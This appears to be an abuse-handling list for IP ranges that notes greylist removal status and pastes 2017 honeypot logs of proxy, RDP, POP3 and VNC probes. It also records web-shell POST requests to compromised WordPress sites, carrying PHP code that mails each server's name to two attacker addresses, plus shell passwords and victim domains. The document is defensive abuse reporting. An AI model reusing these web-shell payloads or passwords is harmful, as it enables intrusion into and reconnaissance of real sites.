- 5.45.64.0/24
- 5.45.64.14: removed
- 5.45.64.20: removed
- 5.45.64.32: removed
- 5.45.64.39: removed
- 5.45.64.92: removed
- 5.45.64.228: removed
- 5.45.64.161: Recent logs:
- Date: 2017-03-06 16:36:06
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:35226->89.33.5.34:1080",
- "MESSAGES": "Array
- (
- [17:34:42] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 16:35:23
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:49206->178.79.134.254:1080"
- }
- Date: 2017-03-06 16:16:40
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:55544->89.33.5.60:1080",
- "MESSAGES": "Array
- (
- [17:15:44] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:57:35
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:35756->89.33.5.53:1080",
- "MESSAGES": "Array
- (
- [16:56:11] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:56:48
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:42606->113.52.133.234:1080"
- }
- Date: 2017-03-06 15:38:12
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:34590->51.255.53.224:1080",
- "MESSAGES": "Array
- (
- [09:40:33] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:37:44
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:41884->178.32.99.247:1080",
- "MESSAGES": "Array
- (
- [09:32:40] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- )
- "
- }
- Date: 2017-03-06 15:37:39
- Attacker ip: 5.45.64.161
- {
- "PORT HIT": "5.45.64.161:48624->192.168.0.54:1080",
- "MESSAGES": "Array
- (
- [14:33:25] => GET http://cdnjs.cloudflare.com/ajax/libs/6px/1.0.3/6px.min.js HTTP/1.1
- Host: cdnjs.cloudflare.com
- User-Agent: Go-http-client/1.1
- Accept-Encoding: gzip
- 5.45.67.0/24
- 5.45.67.5: removed
- 5.45.67.80: removed
- 5.45.70.0/24
- 5.45.70.73:
- Date: 2017-02-05 18:50:46
- Attacker ip: 5.45.70.73
- {
- "ip": "5.45.70.73",
- "listname": "openbl_1days",
- "listlink": "https://www.openbl.org/lists/base_1days.txt"
- }
- 5.45.70.75: removed
- 5.45.70.94: removed
- 5.45.70.108: from this IP we experienced lots of GHH port hits
- 5.45.72.0/24
- 5.45.72.29:
- Date: 2017-02-27 22:09:28
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52984->23.239.77.95:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-02-27 22:09:27
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52983->23.239.77.93:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-02-27 22:09:27
- Attacker ip: 5.45.72.29
- {
- "PORT HIT": "5.45.72.29:52982->23.239.77.92:3389",
- "MESSAGES": "Array
- (
- [17:03:52] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- 5.45.72.39: removed
- 5.45.75.0/24
- 5.45.75.2:
- Date: 2017-03-12 14:15:17
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:35242->37.235.1.96:110",
- "MESSAGES": "Array
- (
- [14:09:46] => USER sexual.sexual@everymail.net
- [14:09:46+1] => QUIT
- )
- "
- }
- Date: 2017-03-12 05:43:27
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:55893->37.235.1.96:110",
- "MESSAGES": "Array
- (
- [05:35:58] => USER showboat@everymail.net
- [05:35:58+1] => QUIT
- )
- "
- }
- Date: 2017-03-11 17:13:56
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:36460->5.63.147.236:110",
- "MESSAGES": "Array
- (
- [16:08:01] => USER kurt_castilloae@100-biker.co.uk
- [16:08:01+1] => QUIT
- )
- "
- }
- Date: 2017-03-11 01:43:01
- Attacker ip: 5.45.75.2
- {
- "PORT HIT": "5.45.75.2:52421->84.2.35.144:110",
- "MESSAGES": "Array
- (
- [01:41:59] => USER aloksa@loksacel.hu
- [01:41:59+1] => QUIT
- 5.45.75.24: not able to remove it from the greylist.
- 5.45.75.28: removed
- 5.45.75.41: removed
- 5.45.75.49: removed
- 5.45.76.0/24
- 5.45.76.15:
- Date: 2017-03-02 19:01:46
- Victim domain: www.anodizadosbp.com
- Attacker ip: 5.45.76.15
- Url: [www.anodizadosbp.com/wp-content/themes/twentytwelve/contact.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- Date: 2017-03-02 18:49:37
- Victim domain: www.chintannipale.com
- Attacker ip: 5.45.76.15
- Url: [www.chintannipale.com/wp-content/db_info.class.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => ryfgddjs1
- )
- ]
- Date: 2017-03-02 18:49:36
- Victim domain: www.absbe.com
- Attacker ip: 5.45.76.15
- Url: [www.absbe.com/wp-content/common.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => nbJK@SHN2
- )
- ]
- Date: 2017-03-02 18:49:27
- Victim domain: www.davidbillis.net
- Attacker ip: 5.45.76.15
- Url: [www.davidbillis.net/wp-los.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- Date: 2017-03-02 18:49:25
- Victim domain: www.chambreavecvie.com
- Attacker ip: 5.45.76.15
- Url: [www.chambreavecvie.com/setting.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => 8I5Ra7z2LaSinfQ
- )
- ]
- Date: 2017-03-02 16:04:36
- Victim domain: www.bratanis.org
- Attacker ip: 5.45.76.15
- Url: [www.bratanis.org/conter.php]
- Agent: [Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36]
- Post data: [Array
- (
- [a] => Php
- [c] =>
- [p1] =>
- $to = "intronet1337@gmail.com";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- $to = "timur.mamoedov@yandex.ru";
- mail($to, "Hello from ".$_SERVER['SERVER_NAME'], "Hello there! How do you do?");
- [p2] =>
- [p3] =>
- [charset] => UTF-8
- [pass] => jgOoo1skw2a_
- )
- ]
- 5.45.76.44: removed
- 5.45.76.53: removed
- 5.45.76.229: removed
- 5.45.77.0/24
- 5.45.77.6: not able to remove
- 5.45.77.30: removed
- 5.45.77.40: was only on user greylist, but removed from that
- 5.45.77.78: removed
- 5.45.84.0/24: isn't in greylist
- 37.1.202.0/24
- 37.1.202.31: not able to remove
- 37.1.202.44: removed
- 37.1.202.83: it is only on user greylist:
- Date: 2017-03-08 13:28:26
- Attacker ip: 37.1.202.83
- {
- "PORT HIT": "37.1.202.83:63254->72.29.77.55:3389",
- "MESSAGES": "Array
- (
- [07:20:39] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- Date: 2017-03-08 13:28:24
- Attacker ip: 37.1.202.83
- {
- "PORT HIT": "37.1.202.83:56715->72.29.66.61:3389",
- "MESSAGES": "Array
- (
- [07:20:32] => u0003u0000u0000+&àu0000u0000u0000u0000u0000Cookie: mstshash=hello
- u0001u0000bu0000u0003u0000u0000u0000
- )
- "
- }
- 37.1.202.93: removed
- 37.1.202.200:
- Date: 2017-03-10 18:32:07
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:39870->89.248.172.104:5900"
- }
- Date: 2017-03-10 13:34:42
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:54920->185.127.128.5:5900"
- }
- Date: 2017-03-09 12:44:12
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:50440->37.97.220.160:5900"
- }
- Date: 2017-03-09 06:57:01
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:42278->91.227.204.247:5666"
- }
- Date: 2017-03-09 06:41:50
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:45080->84.2.35.129:5900"
- }
- Date: 2017-03-09 06:36:33
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:48006->185.127.128.5:5900"
- }
- Date: 2017-03-08 21:50:39
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:35250->91.227.204.21:5666"
- }
- Date: 2017-03-08 19:59:38
- Attacker ip: 37.1.202.200
- {
- "PORT HIT": "37.1.202.200:39376->89.248.172.104:5900"
- }
- 37.1.202.225: not able to remove
- 37.1.202.240: was only on user greylist, but removed from it
- 37.1.202.253: removed
- 37.1.205.0/24
- 37.1.205.86: not able to remove
- 37.1.205.87: was only on user greylist, but removed from it
- 37.1.205.91: removed
- 37.1.206.0/24
- 37.1.206.8: not able to remove
- 37.1.206.114: was only on user greylist, but removed from it